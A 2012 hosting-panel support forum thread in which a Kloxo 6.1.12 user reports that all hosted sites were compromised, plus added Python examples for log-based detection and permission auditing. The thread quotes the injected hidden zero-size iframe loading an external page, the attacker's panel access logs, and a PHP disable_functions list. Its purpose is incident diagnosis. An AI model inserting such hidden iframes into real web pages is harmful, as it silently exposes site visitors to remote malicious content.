LxCenter HyperVM & Kloxo Support

Forum is closed. Use http://community.lxcenter.org/



Kloxo 6.1.12 Hack [message #101670] Wed, 19 September 2012 19:45
massilia (France), Member:
Hello,

I just got hacked with the latest version of Kloxo, 6.1.12.
The same line (with an iframe) was put in some specific files (index.htm, index.php, and some .ini files). All active websites on the server have been infected.
Yet nothing has been found in the log files, and it's somewhat disturbing.

Injection of the iframe into index.htm, index.php, and some .ini files:

<html><body>
<iframe width="0" height="0" src="http://jamnews.ir/sites/mihandownload.htm" scrolling="No" target="_blank"></iframe>
</body></html>

[Updated on: Wed, 29 January 2014 14:02] by Moderator


Re: Kloxo 6.1.12 Hack [message #101674 is a reply to message #101670] Wed, 19 September 2012 20:13
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
Is this in the Kloxo panel itself or a site hosted on it? If a site, what specific site? WordPress, Drupal, etc?

Re: Kloxo 6.1.12 Hack [message #101675 is a reply to message #101674] Wed, 19 September 2012 21:09
massilia (France), Member:
It's on all sites hosted on the Kloxo panel.
I found this log in /usr/local/lxlabs/kloxo/log/user_cmd, and all 32 lines in the file were hacked with this code:
<html><body>
<iframe width="0" height="0" src="http://jamnews.ir/sites/mihandownload.htm" scrolling="No" target="_blank"></iframe>
</body></html>

Log in /usr/local/lxlabs/kloxo/log/user_cmd:
10:44 Sep/19/2012: () paradism 'dos2unix'  '/home/blablabla/blablabla.com/index.php' dos2unix: converting file /home/blablabla/blablabla/index.php to UNIX format ...



And I found another log in /usr/local/lxlabs/kloxo/log/.
The hacker changed all the pages from the Kloxo admin???

46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:16:37 +0200] "GET /undefined HTTP/1.1" 404 22 "http://IP OF SERVER:7778/display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:16:38 +0200] "GET /undefined HTTP/1.1" 404 22 "http://IP OF SERVER:7778/display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:16:39 +0200] "GET /undefined HTTP/1.1" 404 22 "http://IP OF SERVER:7778/display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:16:40 +0200] "POST /display.php HTTP/1.1" 200 28849 "http://IP OF SERVER:7778/display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:17:08 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F%2Findex.html HTTP/1.1" 200 29440 "http://IP OF SERVER:7778/display.php" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:17:43 +0200] "POST /display.php HTTP/1.1" 302 18275 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F%2Findex.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:17:43 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29885 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=lescoiff&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=THE-DOMAIN-IN-SERVER&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F%2Findex.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:26 +0200] "POST /display.php HTTP/1.1" 302 18279 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:27 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29887 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:49 +0200] "POST /display.php HTTP/1.1" 302 18279 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:49 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29887 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:58 +0200] "POST /display.php HTTP/1.1" 302 18127 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:18:59 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29710 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"
46.19.139.249 IP OF SERVER:7778 - [19/Sep/2012:11:53:54 +0200] "POST /display.php HTTP/1.1" 302 18263 "http://IP OF SERVER:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=lescoiff&frm_o_o[1][class]=domain&frm_o_o[1][nname]=THE-DOMAIN-IN-SERVER&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0 AlexaToolbar/alxf-2.16"

[Updated on: Wed, 19 September 2012 21:13]

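The panel log quoted above records the file-manager edits as display.php requests with the ffile class. The following is an added detection example for this thread (not Kloxo code): it parses lines in the combined format shown above, decodes both the %5B-encoded and literal-bracket forms of the frm_o_o parameters, and reports which client IP edited which file. The sample log lines, IPs and names are constructed placeholders.

```python
"""Detect file edits performed through the Kloxo panel's file manager
(the 'ffile' class in display.php requests) in the panel's access log.

Added example for this thread, not Kloxo code. Assumes the combined log
format quoted in the thread, with the vhost:port field after the client IP.
The sample lines, IPs and names below are constructed placeholders."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# client-ip vhost:port remote-user [timestamp] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: a file-manager listing, an edit submitted by POST,
# the confirmation page after the redirect, and an unrelated request.
SAMPLE_LOG = """\
192.0.2.10 203.0.113.5:7778 - [19/Sep/2012:11:16:37 +0200] "GET /display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=clientx&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=example.test&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F HTTP/1.1" 200 28849 "-" "Mozilla/5.0"
192.0.2.10 203.0.113.5:7778 - [19/Sep/2012:11:17:43 +0200] "POST /display.php HTTP/1.1" 302 18275 "http://203.0.113.5:7778/display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=clientx&frm_o_o%5B1%5D%5Bclass%5D=domain&frm_o_o%5B1%5D%5Bnname%5D=example.test&frm_o_o%5B2%5D%5Bclass%5D=web&frm_o_o%5B3%5D%5Bclass%5D=ffile&frm_o_o%5B3%5D%5Bnname%5D=%2F%2Findex.html" "Mozilla/5.0"
192.0.2.10 203.0.113.5:7778 - [19/Sep/2012:11:17:43 +0200] "GET /display.php?frm_action=updateForm&frm_subaction=edit&frm_o_o[0][class]=client&frm_o_o[0][nname]=clientx&frm_o_o[1][class]=domain&frm_o_o[1][nname]=example.test&frm_o_o[2][class]=web&frm_o_o[3][class]=ffile&frm_o_o[3][nname]=//index.html&frm_smessage=[b]edit[/b]+successfully+updated+for+/index.html HTTP/1.1" 200 29885 "http://203.0.113.5:7778/display.php" "Mozilla/5.0"
198.51.100.7 203.0.113.5:7778 - [19/Sep/2012:12:01:02 +0200] "GET /display.php?frm_action=show&frm_o_o%5B0%5D%5Bclass%5D=client&frm_o_o%5B0%5D%5Bnname%5D=clientx HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def kloxo_params(url):
    """Decode display.php parameters. parse_qs unescapes %5B/%5D, so the
    encoded and literal spellings both collapse to 'frm_o_o[3][nname]'."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items()}


def ffile_target(params):
    """Return (client, domain, path) when the request addresses a file
    through the ffile class, else None."""
    client = domain = path = None
    for key, cls in params.items():
        m = re.match(r'frm_o_o\[(\d+)\]\[class\]$', key)
        if not m:
            continue
        name = params.get('frm_o_o[%s][nname]' % m.group(1))
        if cls == 'client':
            client = name
        elif cls == 'domain':
            domain = name
        elif cls == 'ffile':
            path = name
    return (client, domain, path) if path is not None else None


def file_edits(log_text):
    """One record per edit form opened, edit submitted, or edit confirmed."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        # The edit form is submitted by POST and the body is not logged, but
        # the Referer carries the form's own URL, which names the file.
        url = rec['target'] if rec['method'] == 'GET' else rec['referer']
        p = kloxo_params(url)
        if p.get('frm_action') != 'updateForm' or p.get('frm_subaction') != 'edit':
            continue
        tgt = ffile_target(p)
        if tgt is None:
            continue
        if rec['method'] == 'POST':
            kind = 'edit-submitted'
        elif 'successfully updated' in p.get('frm_smessage', ''):
            kind = 'edit-confirmed'
        else:
            kind = 'edit-form-opened'
        events.append({'ip': rec['ip'], 'ts': rec['ts'], 'client': tgt[0],
                       'domain': tgt[1], 'path': tgt[2], 'event': kind})
    return events


def edits_by_ip(log_text):
    """Map each client IP to the set of (domain, path) it submitted edits for."""
    out = defaultdict(set)
    for e in file_edits(log_text):
        if e['event'] == 'edit-submitted':
            out[e['ip']].add((e['domain'], e['path']))
    return dict(out)


if __name__ == '__main__':
    for e in file_edits(SAMPLE_LOG):
        print(e)
    print(edits_by_ip(SAMPLE_LOG))
```

Compare the IPs this reports against the panel's own login log; an edit from an IP that never appeared in a legitimate admin session is the signal this thread is chasing.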

Re: Kloxo 6.1.12 Hack [message #101676 is a reply to message #101675] Wed, 19 September 2012 21:22
massilia (France), Member:
I think I'll return to my last panel, Gplhost DTC, because with this panel in 4 years I was never hacked.
I set up this server with Kloxo 10 days ago (firewall, fail2ban).
I set up the server with centos-5-i386-hostinabox576 and updated CentOS + Kloxo + PHP 5.3.

Re: Kloxo 6.1.12 Hack [message #101680 is a reply to message #101676] Wed, 19 September 2012 23:11
mustafaramadhan (Yogyakarta, Indonesia), Super Grandmaster, Forum Moderator:

The questions are:

1. What php-type is selected in 'webserver config'?
2. What is the setting for 'disable_functions' in 'advanced php config'?

It looks like your own client hacked your VPS.



..:: MRatWork ::..
Server/Web-integrator - perfect not always more useful

--- Need KVM/OpenVZ VPS? - click here (Kloxo-MR READY!) ---

For bug/feature/security - Member rank status

Re: Kloxo 6.1.12 Hack [message #101685 is a reply to message #101680] Thu, 20 September 2012 06:20
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
massilia - Does the index.html date stamp with the malicious content match the date stamp of the Kloxo log?

I see the logs indicate the user in Kloxo is lescoiff. Did this user own all of the domains that were hacked? Were domains of other users hacked?


Re: Kloxo 6.1.12 Hack [message #101691 is a reply to message #101685] Thu, 20 September 2012 08:16
massilia (France), Member:
The hacker hacked all domains and all user accounts.

The hacker entered directly into the admin panel.
Connection log in the admin panel:
client-admin 46.19.139.249 10:31 19 Sep 12:35 19 Sep Logout

Re: Kloxo 6.1.12 Hack [message #101692 is a reply to message #101691] Thu, 20 September 2012 08:51
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
Trying to better understand this so I can see if I can find out whether this is an exploit or just something insecure in the way you have set this up. So just stick with me :)

Do you use http or https to connect to Kloxo and login as admin?
Do you have the admin password in any scripts that you use maybe to create new users for example?
I ask this but know the answer: have you set up an auxiliary account and disabled the admin login?
How is LxGuard configured? How many attempts?
Just give me a range, how many characters is your password? This actually shouldn't matter as much as some may think since LxGuard should be configured to block after 20 failed attempts per IP address, though it may take up to 50 before it catches it depending on how fast it is. So unless your password is a single dictionary word... Of course a 20 - 25 character password with special characters and such would be best.


Re: Kloxo 6.1.12 Hack [message #101695 is a reply to message #101692] Thu, 20 September 2012 10:31
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
Also another question you should answer is: Do you use this same admin password on all of your Kloxo installations?

Re: Kloxo 6.1.12 Hack [message #101869 is a reply to message #101670] Sun, 23 September 2012 07:59
massilia (France), Member:
I use http or https to connect to Kloxo.
I don't have the admin password in any scripts that I use.
I set up an auxiliary account, but the hacker was connected with the admin login.

LxGuard configured:
port: 7778
LxGuard configured with 3 false
Iptables firewall, Fail2ban configured (ssh etc.)

Web server: apache, djbdns, bogofilter
Type Php : mod_php
PHP Config for pserver
Display Errors yes
Register Globals No
Log Errors No
Output Compression yes
Enable Xcache No
Enable Zend Yes
Enable Ioncube Yes

Advanced PHP Config
Enable Dl No
Output Buffering No
Register Long Arrays No
Allow Url Fopen No
Allow Url Include No
Register Argc Argv yes
Magic Quotes Gpc No
Mysql Allow Persistent Flag No

Disable Functions: exec,passthru,shell_exec,system,proc_open,popen,show_source


I'm not alone in this situation; other people got exactly the same problem:
http://forum.lxcenter.org/index.php?t=msg&th=19192&start=0&

I checked all logs and there was no connection error from the hacker's IP => it implies that he didn't try a brute force attack.
The hacker used the admin login and succeeded in connecting the first time, as if he knew the password.
Only active websites were hacked; other disabled accounts on the server haven't been touched.

PS: I have no customers currently, I use this server for my personal use => and I'm not dumb enough to hack my server myself.

[Updated on: Sun, 23 September 2012 08:44]


Re: Kloxo 6.1.12 Hack [message #101872 is a reply to message #101869] Sun, 23 September 2012 08:25
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
So just to be certain, you have logged in to Kloxo with the admin account through http at least once and all your Kloxos use the same password?

Re: Kloxo 6.1.12 Hack [message #101876 is a reply to message #101872] Sun, 23 September 2012 08:45
massilia (France), Member:
All accounts are set up with a random password of more than 8 digits and letters.

Re: Kloxo 6.1.12 Hack [message #101877 is a reply to message #101876] Sun, 23 September 2012 08:50
massilia (France), Member:
For information, I am changing hosting panel; I am going to i-mscp.net.
Because this hack made me waste my time (2 days). I should specify that I have administered servers for over 7 years and this is the first time I have been hacked this way, and I'm lucky, because the hacker could have destroyed everything from the admin account.
This is a shame, because Kloxo has many options and is a good hosting panel.

[Updated on: Sun, 23 September 2012 08:51]


Re: Kloxo 6.1.12 Hack [message #101883 is a reply to message #101877] Sun, 23 September 2012 09:53
mustafaramadhan (Yogyakarta, Indonesia), Super Grandmaster, Forum Moderator:

Simple answer: because of 'Type Php : mod_php' instead of another type (especially suphp).


Re: Kloxo 6.1.12 Hack [message #101888 is a reply to message #101883] Sun, 23 September 2012 10:13
mustafaramadhan (Yogyakarta, Indonesia), Super Grandmaster, Forum Moderator:

Don't know what the reason is for still using the 'unsafe' php-type (mod_php).


Re: Kloxo 6.1.12 Hack [message #101905 is a reply to message #101888] Sun, 23 September 2012 12:13
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
mustafa - I don't think the php type has anything to do with a single-user (massilia is the only person using his Kloxo) security issue. Also, the admin account was specifically logged into. If this truly was a security breach, it would mean the admin account was logged into without a password at all, possibly through some kind of MySQL injection. I don't think this is possible but am looking into it further.

massilia - you still never answered whether or not you logged in as admin through http.


Re: Kloxo 6.1.12 Hack [message #101911 is a reply to message #101905] Sun, 23 September 2012 14:21
massilia (France), Member:
shazar wrote on Sun, 23 September 2012 18:13:
mustafa - I don't think the php type has anything to do with a single-user (massilia is the only person using his Kloxo) security issue. Also, the admin account was specifically logged into. If this truly was a security breach, it would mean the admin account was logged into without a password at all, possibly through some kind of MySQL injection. I don't think this is possible but am looking into it further.

massilia - you still never answered whether or not you logged in as admin through http.


http://img4.hostingpics.net/pics/421947Capturehack.jpg


I connect as admin with http and https (port: 7778).
For me it's a security breach, because in this post ALL of the VMs were hacked:
http://forum.lxcenter.org/index.php?t=msg&th=19192&start=0&

[Updated on: Sun, 23 September 2012 14:32]


Re: Kloxo 6.1.12 Hack [message #101913 is a reply to message #101911] Sun, 23 September 2012 15:01
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
massilia, that doesn't show much. That shows that Wordpress was hacked. A typical WordPress hack in the past does what he pasted there.

Re: Kloxo 6.1.12 Hack [message #101931 is a reply to message #101911] Mon, 24 September 2012 05:41
adfieldz (Lithuania), Valuable Member:
If you are talking about my situation, why would you say it's a WordPress hack when I had no WordPress installed on the VPS?

Anyway, I'm looking into a possible solution.

I'm ready to give full access to Kloxo and SSH to the Kloxo developers on one of my VPSes which were hacked, so you could check it yourself and might find something out.

Please contact me by PM.

Re: Kloxo 6.1.12 Hack [message #101935 is a reply to message #101931] Mon, 24 September 2012 07:26
massilia (France), Member:
My server with Kloxo is closed and I run another, more secure panel.
I can send the logs of this server to the Kloxo developers on demand; I delete this server in 3 or 4 days.
If you want the log files, please specify exactly which folders and which files you want.

Cordially,
Massilia

[Updated on: Mon, 24 September 2012 07:26]


Re: Kloxo 6.1.12 Hack [message #101936 is a reply to message #101935] Mon, 24 September 2012 07:36
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
adfieldz - I am confusing the 2 of you! lol Could you repeat your story in one post here? I just want to read it all together to get it straight in my head.

For massilia the best thing would be the POST that did the login to actually see if a password was typed in. Essentially you believe the attacker did not know your passwords and logged in with a MySQL injection type of attack considering he had absolutely no other access like another login to the system.


Re: Kloxo 6.1.12 Hack [message #101973 is a reply to message #101936] Tue, 25 September 2012 05:48
adfieldz (Lithuania), Valuable Member:
Shazar - my story is here: http://forum.lxcenter.org/index.php?t=msg&th=19192&start=0&

Shortly: someone injected code into all my VPSes running Kloxo.

I'm offering full SSH/panel login so that you could check it out and might find something.

Re: Kloxo 6.1.12 Hack [message #101975 is a reply to message #101973] Tue, 25 September 2012 07:24
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
adfieldz - Any particular PHP application running on all of these VPSes?

Re: Kloxo 6.1.12 Hack [message #101977 is a reply to message #101975] Tue, 25 September 2012 08:16
adfieldz (Lithuania), Valuable Member:
Shazar - basically SilverStripe sites on some of them, 2.4.7; no WordPress, no Joomla, etc.

Re: Kloxo 6.1.12 Hack [message #101978 is a reply to message #101977] Tue, 25 September 2012 08:43
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
My guess is that it is a SilverStripe issue, though it could be mitigated if the docroots were well secured. I am guessing SilverStripe as they have had many security fixes in the past.

I don't think this is a Kloxo problem, but again a better security practice on a docroot basis could be set in place. For example:

When running mod_php, apache runs the pages. With the owner being user123:apache and the permissions being 644, apache could never write to the files.

But suphp runs per user so user123:apache 644 is run as user123 with write access to everything.
So suphp and other per user implementations give you the illusion of security, but unless everything is understood you could be more vulnerable.

So a short term fix would be to chmod to 444 on all files and 555 on all directories. A long term solution could be for Kloxo to have 2 users per account.
1 user called user123 for the user to connect and write files and such. The other could be user123-apache which would be what the apache runs it as.

So to get to a point, what is the ownership and permissions and is it mod_php or suphp? Again still most likely a fault on the SilverStripe part, but this could help.
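The ownership and permission reasoning in the post above can be checked mechanically. The following is an added example for this thread (not Kloxo code) that models the plain Unix owner/group/other write check for a docroot owned user123:apache under mod_php versus suphp, and shows what the 444/555 short-term fix changes; the sample docroot entries are constructed, and root, ACLs and SELinux are out of scope.

```python
"""Which files can the PHP runtime write under mod_php versus suphp,
and what does the 444/555 short-term fix change?

Added example for this thread, not Kloxo code. It applies the plain Unix
owner/group/other check (no root, no ACLs, no SELinux). DOCROOT below is
constructed sample data with the 644/755 defaults described in the thread."""
import grp
import os
import pwd
import stat

# (path, is_dir, mode, owner, group) -- constructed sample docroot,
# owned user123:apache as in shazar's description.
DOCROOT = [
    ('/home/user123/example.test/', True, 0o755, 'user123', 'apache'),
    ('/home/user123/example.test/index.php', False, 0o644, 'user123', 'apache'),
    ('/home/user123/example.test/config.ini', False, 0o644, 'user123', 'apache'),
    ('/home/user123/example.test/uploads/', True, 0o775, 'user123', 'apache'),
]


def php_runtime_user(php_type, account_user):
    """mod_php executes every site as the web server user ('apache' here);
    suphp and other per-user handlers execute each site as its account user."""
    return 'apache' if php_type == 'mod_php' else account_user


def can_write(mode, owner, group, user, user_groups):
    """Unix write check for a non-root user: the owner class applies if the
    user owns the file, else the group class if the user is a member, else
    the 'other' class."""
    if user == owner:
        return bool(mode & stat.S_IWUSR)
    if group in user_groups:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def exposure(entries, runtime_user, runtime_groups):
    """Paths the PHP runtime user could overwrite, i.e. where a compromised
    PHP application could inject the iframe seen in this thread."""
    return [path for path, _is_dir, mode, owner, group in entries
            if can_write(mode, owner, group, runtime_user, runtime_groups)]


def harden(entries):
    """The short-term fix from the thread: 444 on files, 555 on directories."""
    return [(path, is_dir, 0o555 if is_dir else 0o444, owner, group)
            for path, is_dir, _mode, owner, group in entries]


def audit_tree(root, runtime_user, runtime_groups):
    """Run the same check over a real directory tree (Unix only); returns
    the paths the runtime user could write."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in [''] + filenames:  # '' audits the directory itself
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            try:
                owner = pwd.getpwuid(st.st_uid).pw_name
                group = grp.getgrgid(st.st_gid).gr_name
            except KeyError:  # uid/gid without a name entry
                owner, group = str(st.st_uid), str(st.st_gid)
            if can_write(stat.S_IMODE(st.st_mode), owner, group,
                         runtime_user, runtime_groups):
                found.append(full)
    return found


if __name__ == '__main__':
    print('mod_php  :', exposure(DOCROOT, 'apache', {'apache'}))
    print('suphp    :', exposure(DOCROOT, 'user123', {'user123'}))
    print('hardened :', exposure(harden(DOCROOT), 'user123', {'user123'}))
```

Note that under a per-user handler the runtime is the file owner, so it can chmod the 444 files back; this is the "illusion of security" point above, and why the post proposes a separate writing user and executing user per account.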


Re: Kloxo 6.1.12 Hack [message #101980 is a reply to message #101978] Tue, 25 September 2012 09:40
adfieldz (Lithuania), Valuable Member:
